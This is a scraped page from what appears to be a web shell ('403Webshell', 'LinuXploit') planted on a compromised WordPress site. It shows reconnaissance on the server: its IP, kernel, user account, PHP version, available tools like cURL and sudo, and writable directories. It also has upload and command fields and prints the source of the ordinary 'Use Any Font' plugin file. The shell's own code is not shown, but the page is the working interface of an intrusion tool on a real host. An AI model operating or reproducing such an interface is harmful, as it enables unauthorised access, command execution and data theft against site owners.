403Webshell
Server IP : 213.132.222.41  /  Your IP : 216.73.216.254
Web Server : Apache
System : Linux plesk4.nlhosting.net 6.1.0-0.deb11.50-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.176-1~deb11u1 (2026-07-02) x86_64
User : thecovenant ( 10927)
PHP Version : 8.3.32
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/thecovenant.nl/httpdocs/new/wp-content/plugins/use-any-font/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/thecovenant.nl/httpdocs/new/wp-content/plugins/use-any-font//use-any-font.php
<?php
if ( ! defined( 'ABSPATH' ) ) exit; 
/*
Plugin Name: Use Any Font
Plugin URI: https://dineshkarki.com.np/use-any-font
Description: Embed any font in your website
Author: Dnesscarkey
Version: 6.3.11
Author URI: https://dineshkarki.com.np/use-any-font
*/

define ( 'UAF_FILE_PATH', plugin_dir_path( __FILE__ ) );

include UAF_FILE_PATH.'includes/uaf_config.php';
include UAF_FILE_PATH.'includes/functions/uaf_admin_functions.php';
include UAF_FILE_PATH.'includes/functions/uaf_client_functions.php';
include UAF_FILE_PATH.'includes/functions/uaf_font_functions.php';
include UAF_FILE_PATH.'includes/functions/uaf_cache_functions.php';
include UAF_FILE_PATH.'includes/functions/uaf_block_editor_functions.php';


add_action('init', 'uaf_plugin_initialize');
add_action('admin_menu', 'uaf_create_menu');
add_action('admin_enqueue_scripts', 'uaf_admin_assets');
add_action('wp_enqueue_scripts', 'uaf_client_assets');
add_action('admin_notices', 'uaf_admin_notices');

add_action('after_switch_theme', 'uaf_write_css');

add_action( 'wp_ajax_uaf_predefined_font_interface', 'uaf_predefined_font_interface' );

register_activation_hook( __FILE__, 'uaf_plugin_activated' );

Youez - 2016 - github.com/yon3zu
LinuXploit